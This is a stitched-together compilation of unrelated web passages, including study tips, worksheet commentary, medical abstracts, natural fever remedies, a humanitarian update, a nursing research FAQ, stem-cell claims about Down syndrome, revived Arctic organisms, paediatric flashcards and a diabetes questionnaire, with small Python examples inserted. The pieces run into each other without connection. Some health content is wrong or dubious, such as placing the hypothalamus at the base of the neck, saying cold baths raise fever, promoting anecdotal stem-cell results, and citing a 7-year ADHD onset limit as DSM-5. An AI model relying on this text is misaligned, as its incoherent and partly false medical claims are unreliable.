Every learner has different abilities, backgrounds, and life experiences. Some individuals will be entering a trades program directly from high school as part of a dual-credit program or youth initiative and have limited experience outside of the classroom. Others may have been out of the formal education system for a number of years, but bring valuable years of work experience into the classroom. Regardless of where you are starting from, integral to your success in postsecondary education is developing effective study and learning skills. Time spent on these learning tasks will increase the effectiveness of time spent on all other learning tasks in your training program. In addition, the techniques that you choose to adopt and the effective study routine that you develop will benefit you...
In college settings, worksheets such as a Limiting Reactant and Percent Yield Worksheet Answer Key ordinarily refer to a single sheet of paper with questions or exercises for students to complete and note answers on. They are used, to some degree, in most subjects, and have widespread use in the math syllabus, where there are two key types. The first type of math worksheet contains a collection of similar math problems or exercises. These are intended to help a student become skilled in a particular mathematical ability that was taught to them in class. They are usually given to students as homework. The second kind of math worksheet is intended to introduce new topics, and is often completed in the classroom. It is made up of a progressive set of questions that leads to an understanding of the subject to be studied.
Worksheets are important because they are individual activities, and parents also need them. Parents get to see what their child is doing in class. With evolving curricula, parents may not have the necessary background to guide their children through homework or provide additional assistance at home. Having a worksheet template readily available can help with advancing studying at home.
Overall, research in early childhood education indicates that worksheets are recommended mainly for evaluation purposes. Worksheets should not be used for teaching, as this is not developmentally appropriate for the education of young students.
As an assessment tool, worksheets can be used by teachers to gauge students' prior knowledge, learning outcomes, or the process of learning; at the same time, they can be used to allow students to monitor the progress of their own learning.
Worksheet generators are often used to develop the type of worksheets that contain a group of similar problems. A worksheet generator is an application program that quickly generates a group of problems, particularly in mathematics or numeracy. Such software is often used by teachers to make classroom materials and tests. Worksheet generators may be installed on local computers or accessed via a website. There are also many worksheet generators available online. However, authentic worksheets can be made in software like Word or PowerPoint.
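As an illustration of such a generator, this short Python sketch (a hypothetical example, not any particular commercial product) produces a group of similar multiplication drill problems, with a fixed seed so the sheet is reproducible:

```python
import random

def make_worksheet(n_problems: int, seed: int = 0) -> list:
    """Generate a group of similar multiplication drill problems."""
    rng = random.Random(seed)  # fixed seed -> same worksheet every run
    problems = []
    for _ in range(n_problems):
        a, b = rng.randint(2, 12), rng.randint(2, 12)
        problems.append(f"{a} x {b} = ____")
    return problems

for line in make_worksheet(5):
    print(line)
```

An answer key would be the same generator with the product filled in, which is how paired worksheet/answer-key sheets are typically produced.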
eHSP72 (extracellular heat-shock protein 72) is increased in the plasma of both types of diabetes and is positively correlated with inflammatory markers. Since aging is associated with a low-grade inflammation and IR (insulin resistance), we aimed to: (i) analyse the concentration of eHSP72 in elderly people and determine correlation with insulin resistance, and (ii) determine the effects of eHSP72 on β-cell function and viability in human and rodent pancreatic β-cells. Fasting blood samples were collected from 50 older people [27 females and 23 males; 63.4±4.4 years of age; BMI (body mass index)=25.5±2.7 kg/m2]. Plasma samples were analysed for eHSP72, insulin, TNF (tumour necrosis factor)-α, leptin, adiponectin and cortisol, and glycaemic and lipid profile. In vitro studies were conducted using rodent islets and clonal rat and human pancreatic β-cell lines (BRIN-BD11 and 1.1B4 respectively). Cells/islets were incubated for 24 h with eHSP72 (0, 0.2, 4, 8 and 40 ng/ml). Cell viability was measured using three different methods. The impact of HSP72 on β-cell metabolic status was determined using Seahorse Bioscience XFe96 technology. To assess whether the effects of eHSP72 were mediated by Toll-like receptors (TLR2/TLR4), we co-incubated rodent islets with eHSP72 and the TLR2/TLR4 inhibitor OxPAPC (oxidized 1-palmitoyl-2-arachidonoyl-sn-glycero-3-phosphocholine; 30 μg/ml). We found a positive correlation between plasma eHSP72 and HOMA-IR (homoeostasis model assessment of IR) (r=0.528, P<0.001), TNF-α (r=0.389, P<0.014), cortisol (r=0.348, P<0.03) and leptin/adiponectin (r=0.334, P<0.03). In the in vitro studies, insulin secretion was decreased in an eHSP72 dose-dependent manner in BRIN-BD11 cells (from 257.7±33 to 84.1±10.2 μg/mg of protein per 24 h with 40 ng/ml eHSP72), and in islets in the presence of 40 ng/ml eHSP72 (from 0.48±0.07 to 0.33±0.009 μg/20 islets per 24 h). 
Similarly, eHSP72 reduced β-cell viability (at least 30% for BRIN-BD11 and 10% for 1.1B4 cells). Bioenergetic studies revealed that eHSP72 altered pancreatic β-cell metabolism. OxPAPC restored insulin secretion in islets incubated with 40 ng/ml eHSP72. In conclusion, we have demonstrated a positive correlation between eHSP72 and IR. In addition, we suggest that chronic eHSP72 exposure may mediate β-cell failure.
Fever describes a condition in which the body’s temperature is higher than normal. It’s a symptom of many types of illnesses and is usually a response to infection or inflammation. Fever can also be caused by exposure to heat, poisons, certain drugs, or injuries to the brain. While it’s usually treated with medication, there are a handful of natural alternatives. Here are some natural fever relievers.
Fluids
Dehydration is often a result of fever, making the sick individual feel worse. The best way to counter this is to drink plenty of fluids. Make sure you drink enough to make your urine appear pale in color.
Note that while water is best, sports drinks (like Gatorade) and rehydration solutions (like Pedialyte) can help replace minerals and electrolytes lost to dehydration. Even grapes can serve as a source of hydration. Orange juice is also a great choice, due to its high vitamin C content. Note that vitamin C helps the immune system fight infection.
Calcium
Part of the reason you may feel achy with a fever is due to a process that removes calcium from your bones. This process allows the body to draw calcium from the bones for the purpose of fighting infection. Supplementation can help provide the needed calcium, reducing the need for drawing it from within the body.
A number of experts believe calcium can actually reduce the duration of an illness by increasing the effectiveness of the accompanying fever. One study involving dengue fever patients showed that supplementing with calcium and vitamin D (to assist in calcium absorption) helped reduce both the symptoms and duration of the illness.
Warm Bath
A warm bath is one of the best natural fever relievers, since it can directly impact your internal temperature. Note that the water will feel cool because of the fever. Use a sponge to rinse off delicate areas like the armpits and groin, since this can help you cool down more quickly. Avoid taking a cold bath, since this can increase blood flow to the organs, which will raise your temperature further.
Sleep
As difficult as it might be to get enough sleep sometimes, it’s one of the best ways to get over an illness more quickly. Rest makes it possible for your body to heal itself through natural processes. While your body is resting, it is producing more white blood cells to assist in the fight against infection. If you’re having trouble sleeping due to the illness, try taking a warm bath first, as described above.
Cold Compress
A cold compress is another effective way to reduce fever naturally. Apply a cool, wet cloth to the forehead or back of the neck for optimal effect. The base of the neck is where the hypothalamus is located, making it an ideal location on which to place the compress.
Note that while a hot compress is effective for relieving pain, it should not be used for a fever. The purpose of using a cold one is that as the water evaporates from the skin, it draws out the heat, reducing the body’s temperature. Once the cloth gets warm, remove it, soak it in some more cool water, wring it out and use it again.
Apple Cider Vinegar
Apple cider vinegar has been a popular fever remedy among grandmothers for generations. One way to use it is to soak a washcloth in diluted vinegar and place it on the forehead or abdomen. You can also wrap the cloth around the soles of your feet. The purpose of using the cloth is to provide a path along which the heat can be drawn out. Note that it can also be added to a warm bath or mixed into a glass of water with honey for direct consumption.
Keep in mind that fevers are a vital part of your body’s natural defense system. By raising your temperature, the body triggers your immune system and speeds up the detoxification process. While fevers might be unpleasant, they’re one of the best indications that your immune system is working the way it’s supposed to.
Source: World Vision
Country: Democratic Republic of the Congo, Ethiopia, Kenya, Rwanda, Somalia, South Sudan, Sudan, Uganda, United Republic of Tanzania

Key messages
• Humanitarian needs: At least 28 million people (more than half of them children) are in need of humanitarian assistance. Conflict, disease, acute food shortages, high inflation, and inadequate nutrition have left children and their families extremely vulnerable.
• Conflict a major driver of forced displacements: Conflict continues to be a major factor driving people out of their homes. As the Democratic Republic of Congo prepares for elections in December, neighbouring countries such as Burundi and Uganda are on high alert for an influx of refugees. This means that the number of people requiring humanitarian assistance will likely increase.
• Food insecurity: At least 20 million are struggling to meet their daily food and nutrition needs
FREQUENTLY ASKED QUESTIONS
How can I argue the importance of a Research Problem (PI)? In general, the importance of a PI is determined by the impact it has on health care. You must do it in the most objective way possible, based on documents that will be part of the bibliography. Some types of documents that may be of interest:
Epidemiological or statistical reports (particularly the reports of health institutions or the hospital itself). Reports made by scientific societies (consult their web pages). Health plans of the health authorities, both at the national and regional level (review institutional platforms, as there are numerous reports on health problems that they consider to be priorities).
How do I know that the Project is relevant? It is determined based on its adaptation to the priorities of the organization and the potential impact it has on both the citizen and the professionals. The project is expected to improve some health outcomes or quality of life in defined population groups, which, due to susceptibility or frequency of the problem, are especially vulnerable to it. It also provides alternatives to problems in the organization and the provision of health services, with an innovative and evaluable perspective in terms of cost-effectiveness. And also that it has a positive influence on the models of professional practice.
What databases can I use to perform the bibliographic search? Search databases specialized in the health field. If you search CUIDEN and CINAHL, you will access 80% of the knowledge available in Nursing. In PUBMED, IBECS and MEDES you can find works from disciplines besides Nursing. In COCHRANE you can find systematic reviews (you are in luck if you find one closely related to your topic). Through DOAJ, SCIELO, CANTARIDA, DIALNET and GOOGLE SCHOLAR you can find the full text of articles.
Use selection criteria to limit searches, such as: subject area, type of study, type of documents (original articles, clinical cases, reviews, monographs, etc.), time limitation (scientific knowledge is generally considered to renew itself roughly every 7 years, so keep that in mind), language, etc.
What does CRITICAL ANALYSIS mean? It means presenting only what you have drawn from the documents you select, because it serves the reader's understanding of the topic you are going to discuss. You should therefore review only the data that enrich your work, and leave out the rest.
How do I know which are the best documents? Learn to distinguish the main authors from occasional ones. Locate the expert authors by looking for the most cited names in the bibliography you gather. Often the best articles are published in the journals with the greatest impact; see the lists of most cited journals in the JCR-SCI, SCOPUS or CUIDEN CITACION catalogues (https://ndr2014.org).
What if I do not find enough articles about what I'm looking for? One of two things: either the search you have done is defective (most likely), in which case you must keep trying new strategies, or there is a knowledge gap on the subject. If so, describe it when you present the background.
But do not settle: there may not be much on the specific problem you will study, but there will be on the general theme in which it sits.
How can I identify the theoretical framework? What you are going to do with the theoretical framework is to clarify the theoretical perspective of the parties when raising your work. The ideal is to do it in two parts:
a) Anticipate the result you hope to achieve. What is your conviction? Do it by establishing a theoretical relationship between a cause and an effect, for example:
This work is based on the conviction that the limited recognition of family care is socially determined by the moral obligation of women as caregivers.
b) Complete the theoretical perspective with the support of higher-level theories that expand the understanding of the phenomenon of study (nursing theories, socio-cultural theories, etc.). In the previous case, gender theories would be a good option.
What style should I use in the drafting of the IP? Use the 3C strategy: clarity, conciseness and correction.
Clarity means the text should be pleasant to read, avoiding unnecessary technicalities and far-fetched language (the aim is to impress with content, not verbiage). Concision responds to the saying "good, if brief, twice as good": limit yourself to the ideas that are strictly necessary, and avoid overwhelming the reader with additional content that only sows confusion. Correction means that what is written should follow what is expected of a well-constructed text from the syntactic and orthographic point of view. Everything you present during the tutorial period is provisional, but try to do it right from the beginning and you will save time (for example, if you write the bibliography properly from the start, you will avoid mistakes). Always write neatly; otherwise typographical and spelling errors will accompany you throughout the process and you will get used to them.
How do I avoid typos in the text? Typos have a pernicious effect on a TFG, so fight them energetically. If you let one slip, you will probably find it again in the final version of the document, so get used to writing correctly composed texts from the start. Neatness refers to the composition of the text, which must be free of typographical errors. Automatic numbering and headings are often a source of mismatches in the text, so it is advisable to use them sparingly; we recommend you learn to do them manually and never lose control of the text. Pay special attention to bibliographic notation: learn early to reference the bibliography properly, as it is a major source of errors. Reference managers can help, but they can also hinder learning. Before sending the text, even a preliminary version, review it thoroughly; it is not enough to trust the automatic spell-checker, so review it again and again until everything is right.
Can I work with texts from other authors without incurring problems of plagiarism or piracy? Yes, but keep in mind a sacred rule: never copy and paste, or in the end you will not know what is yours and what is not. The right approach: read the text you have selected several times until you are familiar with it, write down the main ideas in a separate file in your own words, and record the bibliographic reference of where you took them from.
If you decide to include someone's literal text, mark it in quotes and always identify the author. You should not include literal passages longer than ten lines, to avoid copyright conflicts.
Publication Overview
Increasing competition for resources across the globe reveals the finite nature of the resources that fuel our societies. The study of peak resource consumption originated with the concept of “peak oil,” the idea that oil production will reach an upper limit and then decline. Applied to water resources, the concept of “peak water” illustrates the tension between the human need for water and the ecological limits of using that water. Understanding the links between human demands for water and peak water constraints can help water managers and planners move towards more sustainable water management and use.
Psychoactive substance consumption in recreational settings among university students in Colombia (Academic Article)
Abstract
The consumption of psychoactive substances (PAS) is a public health problem in Colombia and worldwide. People who consume such substances are becoming younger, and the effects are potentially harmful and may affect every area of an individual's adjustment. Although it has often been conceived that way, the use of PAS is not always associated with personal problems or high degrees of stress; there may be other associated motivations. Objective: The objectives of this article are to present: (a) the relative frequency of consumption of PAS among college students; (b) which PAS are consumed most by college students, and differences in their consumption by sex and by age; and (c) the relationship between the consumption of PAS and recreational contexts. Materials and methods: This is a descriptive correlational study derived from an Italian research project, in which the sample comprised 226 college students from four undergraduate programs of a private university in Bogotá DC, selected using a stratified random sampling procedure with proportional allocation. Participants filled out a questionnaire. Results: The PAS with the highest consumption were alcohol, nicotine and marijuana. Males showed predominantly higher consumption. The results are consistent with the national trend. Conclusion: The consumption of PAS among college students is high, and some recreational contexts are closely associated with this behaviour.
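The stratified random sampling with proportional allocation described in the methods can be sketched as follows; the programme names and enrolment figures below are hypothetical, not the study's actual strata.

```python
def proportional_allocation(strata_sizes, total_sample):
    """Allocate a total sample across strata proportionally to stratum size.

    Uses largest-remainder rounding so the allocations sum to total_sample.
    """
    population = sum(strata_sizes.values())
    raw = {s: total_sample * n / population for s, n in strata_sizes.items()}
    alloc = {s: int(r) for s, r in raw.items()}
    leftover = total_sample - sum(alloc.values())
    # Hand the remaining units to the strata with the largest fractional parts
    for s in sorted(raw, key=lambda s: raw[s] - alloc[s], reverse=True)[:leftover]:
        alloc[s] += 1
    return alloc

# Hypothetical enrolment per undergraduate programme (not the study's real strata)
programmes = {"psychology": 400, "engineering": 300, "law": 200, "medicine": 100}
print(proportional_allocation(programmes, 226))
```

Each stratum's share of the 226 participants then mirrors its share of the enrolled population, which is what keeps the sample representative across programmes.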
Without a doubt, stem cells are one of the biggest medical breakthroughs for studying and treating various diseases. Because of them, researchers can better understand how disease develops and can create effective treatment options without testing them on an actual patient. It is because of these benefits that stem cell therapy, also known as regenerative medicine, is considered one of the most promising advancements in medicine for disease treatment.
Though stem cell therapy is still a relatively new and developing field, studies are leading researchers to believe it will be a major medical development benefiting patients dealing with a large number of diseases, injuries, and other ailments. While the most common stem cell treatment options target various types of cancers, heart disease, and injuries, one approach has been less discussed. Here we'll explore how stem cell therapy might treat Down Syndrome.
Down Syndrome Development
Down Syndrome occurs when a person is born with an extra copy of the 21st chromosome, which changes how the body and brain develop, according to the U.S. Centers for Disease Control and Prevention. The CDC also states that Down Syndrome remains the most common chromosomal disorder, with about 6,000 babies born with it in the United States each year, or 1 in every 700 births. Between 1979 and 2003, the number of babies born with Down Syndrome increased by 30%, and its prevalence rises with the mother's age.
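As a quick sanity check, the two CDC statistics quoted above are mutually consistent; the annual US birth count used here is an assumption (roughly 3.9 million in recent years), not a figure from the article.

```python
# Cross-check the quoted figures: "about 6,000 babies each year" versus
# "1 in every 700 births". Annual US births is an assumed round number.
annual_us_births = 3_900_000
prevalence = 1 / 700                      # 1 in every 700 babies
expected_cases = annual_us_births * prevalence
print(round(expected_cases))              # about 5,600 per year, close to the quoted ~6,000
```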
Stem Cell Therapy for Down Syndrome
Though stem cell therapy for Down Syndrome is still very early in development, studies suggest it could be an effective treatment. Across several studies, more than 300 Down Syndrome patients, ranging in age from 8 months to 8 years, were treated with neural stem cell therapy. After treatment, the patients reportedly showed varied levels of improvement in intellectual development, speech, muscle strength, reaction speed, and gait.
This year, doctors in New Delhi, India, treated a baby with Down Syndrome with stem cells. Geeta Shroff, a stem cell expert, noted that after the treatment, there were parts of the baby’s body that started improving, such as muscle tone and some movement. It was also noted the baby showed improvement mentally and physically in a relatively short period of time. This, according to Shroff, happened after three months of the treatment. Some examples of the improvements that developed in the baby after stem cell therapy included better muscle tone in all limbs, heightened babbling and crawling, and also recognizing those near him after the first session of stem cell therapy. Though this was only one case with stem cell therapy and Down Syndrome, researchers are hopeful this can be the beginning of a major breakthrough.
It is also believed that with Down Syndrome, stem cell therapy could be effective at targeting a specific gene before birth, which could lead to a targeted treatment. This treatment would consist of reversing abnormal embryonic brain development and working to improve cognitive function after birth. The idea came from a Rutgers-led study that took skin cells from a patient with Down Syndrome and reprogrammed them into human induced pluripotent stem cells. These stem cells contained the extra copy of the 21st chromosome that leads to Down Syndrome, allowing scientists to better understand its development and to identify which gene to target for treatment: the human chromosome 21 gene OLIG2. Using the induced pluripotent stem cells, scientists created a brain model that mirrored the patient's, providing a strong basis for research.
The Future with Down Syndrome and Stem Cell Treatments
As stem cell therapy is still in development, there are long strides to go before treatments are ready for wider use. Stem cell therapies in general are still slowly being approved, and plenty of research remains to be conducted. One example is Japan's recent approval of stem cell therapies for the spinal cord, based largely on a study in which patients were injected with stem cells extracted from their own bone marrow. The team leading that study found that the patients regained some movement and sensation; however, the approval has drawn concern over a lack of research and insufficient trials. Studies like the Rutgers-led one have shown that stem cells can be used to develop a greater understanding of Down Syndrome and to target the specific gene for proper treatment.
The future of Down Syndrome and stem cell therapy still has a long road ahead. However, recent studies and research have shown that stem cell therapy may lead to a successful treatment of Down Syndrome. Plenty of trials and studies must still be conducted, but hopefully, in time, further research and results can reassure scientists that stem cell therapy will be a healthy and safe treatment for Down Syndrome. If it proves successful and safe, this will no doubt be a medical breakthrough that enriches the lives of many patients with Down Syndrome and leads to more successful treatment of this condition for future generations.
In recent years, researchers have reawakened life in organisms frozen within the Arctic permafrost. These studies are challenging accepted ideas about the resilience of lifeforms, hinting at the future of the environment after global warming, and even at the chances of life on other planets. Scientists have revived moss and even worms that had been assumed dead in glaciers and in the frozen earth, but are now regularly being exposed by thawing ice.
Moss Revival After 150 Years
In 2009, Catherine Le Farge, an evolutionary biologist, and her colleagues were working at the edge of a large glacier known as the Teardrop, in Northern Canada. She came across numerous specimens of moss "of the species Aulacomnium turgidum finally free from its icy entombment," according to Stuff. There were some green tints on the plant, though it had been frozen in ice since the mid-19th century.
This material was presumed to be dead, but the verdant hues on the moss suggested to Le Farge that it was worth investigating. She decided to bring the samples back to her university in Edmonton, and placed them in nutrient-rich soil in a bright, warm environment. After a period of time, a number of the mosses came into leaf, despite having been "dead" for over a century. Le Farge is quoted by Stuff as saying, "We were quite blown away."
The moss had desiccated in the extreme cold, which meant it did not freeze solid. Normally, ice can form in the tissues of living and dead organisms, and it "can shred cell membranes and other essential biological equipment," according to Stuff. This distinctive biological characteristic of moss meant that it could be revived.
Frozen lifeforms, such as the moss, have been successfully revived. (angelacina1 / Public Domain)
Frozen Worms Awakened
Following on from the work of Le Farge and her colleagues, other scientists have begun to revive frozen organisms. Peter Convey and his team from the British Antarctic Survey have "awoken a 1500-year-old moss buried more than three feet underground in the Antarctic permafrost," according to Annith. It appears that the ice can shield the mosses from environmental damage and from the radiation that would otherwise break down their DNA, preserving the plants.
Researchers have also been able to revive bacteria and complex multicellular organisms that had been entombed in glaciers. One of the most exciting instances of this is the work of Tatiana Vishnivetskaya, from the University of Tennessee, on nematodes (roundworms) thousands of years old that were found in the Siberian tundra.
She announced an "accidental discovery" made while she was working with the organisms in Petri dishes, says Stuff. The scientist observed the worms reawakening, even though they had been frozen for thousands of years. Her work has shown that it is not only simple organisms that can survive the brutal environment of extremely low temperatures.
Researchers have revived frozen lifeforms from the Arctic, such as worms. (John Donges / CC BY-SA 2.0)
The recent research has shown that desolate areas like the Arctic are not simply dead zones. Instead, it appears that "glaciers and permafrost are not merely graveyards for multicellular life," according to Stuff. It also shows that a select few species have great resilience.
It appears, too, that some organisms can wait for a more favourable environment as part of their survival strategy. They are able to stay literally frozen in time, or become "zombies", until conditions allow them to be revived.
What Does This Say About Life on Other Planets?
Some believe that the ability of organisms to survive extreme cold has repercussions for the possibility of life on other planets. If lifeforms can survive in a glacier, might they not also survive in apparently desolate and uninhabitable worlds? The resilience of certain organisms may make it more plausible that life exists elsewhere in the universe.
Northern polar ice cap on Mars. Does the ice hold frozen lifeforms? (Fabio Bettani / Public Domain)
The discovery that some organisms can survive extreme cold can also help us understand how regions that are now frozen may cope with global warming. As glaciers and permafrost thaw and retreat, anything that can survive in the ice may re-colonize the environment. For example, mosses can flourish once again and prepare the way for other plants, and even animals, to colonize formerly frozen lands.
The studies by Le Farge, Convey, and others demonstrate that ancient life can be renewed and show the resilience of some forms of biological life. This is encouraging given growing concerns over the environment, and the research offers hope that life will be able to survive even the environmental disasters predicted by many scientists and environmentalists.
BAS, the team studying the frozen lifeforms, runs research stations in the British Antarctic Territory. (Ravenpuff / CC BY-SA 3.0)
Top image: Ellesmere Island, Canada, where researchers are reviving frozen lifeforms. Source: James / Adobe Stock.
By Ed Whelan
Flashcards in Paediatric Behavioral and Psych Disorders Deck (9):
1
What are some clinical features on history that parents often identify that may indicate their child has autism? Parents often identify that something is different about their child before the second birthday. Early features include lack of pretend play, of pointing out objects to another person, and of social interest and social play.
2
What is the difference between Asperger's syndrome and autism? Asperger's syndrome is used to describe individuals with normal intelligence and no obvious delay in language development, but impaired social and communication skills with an egocentric approach to others. They often exhibit a range of obsessional interests and some social immaturity.
3
How might we manage functional constipation in a child? • Behavioural modifications- positioning on toilet, toileting after meals • Positive reinforcement of toileting behaviour • Increasing dietary intake and ensure adequate hydration • Oral osmotic laxatives are first line like Movicol. Use daily longterm if needed. In infants use coloxyl drops • If inpatient, can use NGT with macrogol (glycoprep) which is the same thing as movicol; if severe disimpaction may be considered Arrange follow up in continence/encopresis clinic or general medical clinic for difficult cases
4
define the clinical features of ADHD? (DSM 5) inattention, hyperactivity, impulsivity that has persisted > 6 months to a degree that is maladaptive and inconsistent with developmental level. onset can be NO LATER than 7 yrs of age disturbances cause significant distress and social/functional/occupational impairment not better explained by other medical/mental illness
5
how might we examine/ix a child with ADHD? Neurodevelopment assessment: fine and gross motor coordination, visual‐motor integration, auditory and visual sequencing. • School reports. • Psychoeducational assessment: An educational psychologist performs a formal assessment to identify their learning strengths and weaknesses. • Audiology including auditory processing assessment is often helpful.
6
describe the stepwise management of ADHD? 1. behavioural modification with positive reinforcement 2. educational support strategies 3. medical management with dexamphetamine/clonidine/atomoxetine
7
what are some management advice you can give to the parent of a 'fussy eater'? Showing independence is an important part of toddler development – choosing and refusing food is an expression of independence. • Serve small portions – lower expectations. • Change the way food is presented. • Include limited healthy options and allow the child to choose among the options. • Include some healthy food choices that they like. Offering cereal at lunch is okay! A lack of variety is not a major worry at this age. • Avoid filling up on milk and juice. Large volumes of milk (> 600 mL a day) can make the child feel full. Juice is not necessary in the child’s diet. • Give the child time to enjoy the meal without comment. Remove the food after 30 minutes or if they dawdle or lose interest.
8
define primary and secondary enuresis? primary enuresis- continuously wet for at least 6 months secondary enuresis- child was previously dry for at least 6 months and has now relapsed
9
Evaluating your likely current (and near future) state of health means taking into account the risk factors — such as diabetes in relatives — that affect you.
Our medical diagnosis tool, The Analyst™, identifies major risk factors by asking the right questions.
Diabetes in either distant or close relatives?
Possible responses:→ None / don't know
→ Yes, in a distant relative
→ Yes, in 1 direct or 2 distant relatives
→ Yes, in 2 direct relatives
→ Yes, in more than 2 direct relatives
If you have a family history of high blood pressure, heart or kidney disease,
diabetes or stroke, you should have your blood pressure tested annually.
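A minimal sketch of how such a questionnaire response might be mapped to a risk weight. The Analyst's actual scoring is not public, so the weight values below are purely illustrative assumptions; only the response wording comes from the questionnaire above.

```python
# Hypothetical mapping from questionnaire response to a relative-risk weight.
# The numeric weights are illustrative only, not The Analyst's real scoring.
DIABETES_FAMILY_HISTORY = {
    "none / don't know": 0.0,
    "yes, in a distant relative": 0.5,
    "yes, in 1 direct or 2 distant relatives": 1.0,
    "yes, in 2 direct relatives": 2.0,
    "yes, in more than 2 direct relatives": 3.0,
}

def risk_weight(response: str) -> float:
    """Look up the risk weight for a response, case-insensitively."""
    try:
        return DIABETES_FAMILY_HISTORY[response.strip().lower()]
    except KeyError:
        raise ValueError(f"unknown response: {response!r}")

print(risk_weight("Yes, in 2 direct relatives"))  # 2.0
```

A real tool would combine many such weighted factors (family history, age, blood pressure, and so on) into an overall risk estimate.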
Abstract and Introduction
Abstract
Objective: High sodium (HS) diet is associated with hypertension (HT) and insulin resistance (IR). We evaluated whether HS diet was associated with a dysregulation of cortisol production and metabolic syndrome (MetS).
Patients and measurements: We recruited 370 adults (18–85 years, BMI 29·3 ± 4·4 kg/m2, 70% women, 72% HT, 61% MetS). HS diet (urinary sodium >150 mEq/day) was observed in 70% of subjects. We measured plasma hormones, lipid profile, urinary free cortisol (UFC) and cortisol tetrahydrometabolites (THM).
Results: Urinary sodium was correlated with UFC (r = +0·45, P < 0·001) and cortisol THM (r = +0·41, P < 0·001), and inversely with adiponectin, HDL and aldosterone, after adjusting by age, gender and BMI. Subjects with high, compared with adequate sodium intake (50–149 mEq/day) had higher UFC (P < 0·001), THM (P < 0·001), HOMA-IR (P = 0·04), HT (81% vs 50%, P < 0·001), MetS (69% vs 41%, P < 0·001) and lower adiponectin (P = 0·003). A multivariate predictive model adjusted by confounders showed a high discriminative capacity for MetS (ROC curve 0·878) using four clinical variables: HS intake [OR = 5·6 (CI 2·3–15·3)], HOMA-IR [OR 1·7 (1·3–2·2)], cortisol THM [OR 1·2 (1·1–1·4)] and adiponectin [OR = 0·9 (0·8–0·9)]; the latter had a protective effect.
Conclusions: High sodium diet was associated with increased urinary cortisol and its metabolites. HS diet was also associated with HT, insulin resistance, dyslipidaemia and hypoadiponectinaemia, even when adjusting for confounding variables. Further, we observed that high salt intake, IR and higher cortisol metabolites, alone or combined in a simple clinical model, accurately predicted MetS status, suggesting an additive mechanism in obesity-related metabolic disorders.
Introduction
Central obesity, hypertension, derangement of glucose and lipid metabolism are hallmarks of the metabolic syndrome (MetS), which is highly prevalent worldwide.
[1] The mechanisms leading to MetS are not fully understood, but several complementary hypotheses have been proposed including insulin resistance (IR), adipose tissue dysregulation, inadequate aldosterone suppression and increased cortisol production. [2,3]
Populations with liberal salt intake have higher incidences of HT and cardiovascular events, and its related health outcomes are associated with high medical costs.
[4] Moreover, high sodium intake has been reported to be an important clinical factor implicated in salt sensitivity in MetS. [5] There is also a reported relationship between increased sodium intake and insulin resistance (IR) and type 2 diabetes mellitus (T2DM). [6] Numerous mechanisms have been postulated to explain why liberal sodium intake contributes to metabolic disorders, with special emphasis in inadequate aldosterone suppression and increased mineralocorticoid receptor (MR) activation by factors other than aldosterone. [7,8]
We and others have shown that obesity and MetS, when correctly excluding subclinical Cushing's syndrome, are associated with increased levels of urinary glucocorticoid (GC) metabolites, but normal plasma values.
[3,9,10] Moreover, GC metabolites levels are correlated with HT, IR and dyslipidaemia, resembling metabolic abnormalities observed with liberal salt intake. [3] Although the relationship between high sodium diet and GC production has been less studied than aldosterone, it has been described that high sodium diet increases local GC production in a rodent model and that salt loading increases urinary cortisol and sodium restriction decreases cortisol excretion in human studies. [11,12,13]
The aim of the present study was to evaluate a possible dysregulation of cortisol production secondary to liberal sodium intake that could have an essential role in MetS and obesity-related metabolic disorders.
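The four-variable predictive model reported in the abstract can be sketched as a logistic score built from the published odds ratios. The intercept is not reported in the abstract, so the value used below is a placeholder assumption; the sketch only illustrates how the odds ratios combine, not the study's fitted model.

```python
import math

# Coefficients are the natural logs of the odds ratios reported in the abstract.
# The intercept is NOT reported, so the value below is a placeholder assumption.
COEF = {
    "high_sodium":  math.log(5.6),  # 1 if urinary sodium > 150 mEq/day, else 0
    "homa_ir":      math.log(1.7),  # per unit of HOMA-IR
    "cortisol_thm": math.log(1.2),  # per unit of cortisol tetrahydrometabolites
    "adiponectin":  math.log(0.9),  # per unit of adiponectin (protective, OR < 1)
}
INTERCEPT = -3.0  # hypothetical

def mets_probability(high_sodium, homa_ir, cortisol_thm, adiponectin):
    """Predicted probability of metabolic syndrome under the sketched model."""
    logit = (INTERCEPT
             + COEF["high_sodium"] * high_sodium
             + COEF["homa_ir"] * homa_ir
             + COEF["cortisol_thm"] * cortisol_thm
             + COEF["adiponectin"] * adiponectin)
    return 1.0 / (1.0 + math.exp(-logit))

# A high-sodium subject has higher predicted risk than an otherwise identical one
print(mets_probability(1, 2.5, 3.0, 8.0) > mets_probability(0, 2.5, 3.0, 8.0))  # True
```

Note how the protective factor (adiponectin, OR < 1) contributes a negative log-odds term, while the other three push the predicted probability upward.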
Clin Endocrinol. 2014;80(5):677-684. © 2014 Blackwell Publishing
We attempt to review the safety assessment of personal care products (PCP) and ingredients that are representative and pose complex safety issues. PCP are generally applied to human skin and mainly produce local exposure, although skin penetration or use in the oral cavity, on the face, lips, eyes and mucosa may also produce human systemic exposure. In the EU, US and Japan, the safety of PCP is regulated under cosmetic and/or drug regulations. Oxidative hair dyes contain arylamines, the most chemically reactive ingredients of PCP. Although arylamines have an allergic potential, taking into account the high number of consumers exposed, the incidence and prevalence of hair dye allergy appears to be low and stable. A recent (2001) epidemiology study suggested an association of oxidative hair dye use and increased bladder cancer risk in consumers, although this was not confirmed by subsequent or previous epidemiologic investigations. The results of genetic toxicity, carcinogenicity and reproductive toxicity studies suggest that modern hair dyes and their ingredients pose no genotoxic, carcinogenic or reproductive risk. Recent reports suggest that arylamines contained in oxidative hair dyes are N-acetylated in human or mammalian skin resulting in systemic exposure to traces of detoxified, i.e. non-genotoxic, metabolites, whereas human hepatocytes were unable to transform hair dye arylamines to potentially carcinogenic metabolites. An expert panel of the International Agency on Research of Cancer (IARC) concluded that there is no evidence for a causal association of hair dye exposure with an elevated cancer risk in consumers. Ultraviolet filters have important benefits by protecting the consumer against adverse effects of UV radiation; these substances undergo a stringent safety evaluation under current international regulations prior to their marketing. Concerns were also raised about the safety of solid nanoparticles in PCP, mainly TiO(2) and ZnO in sunscreens. 
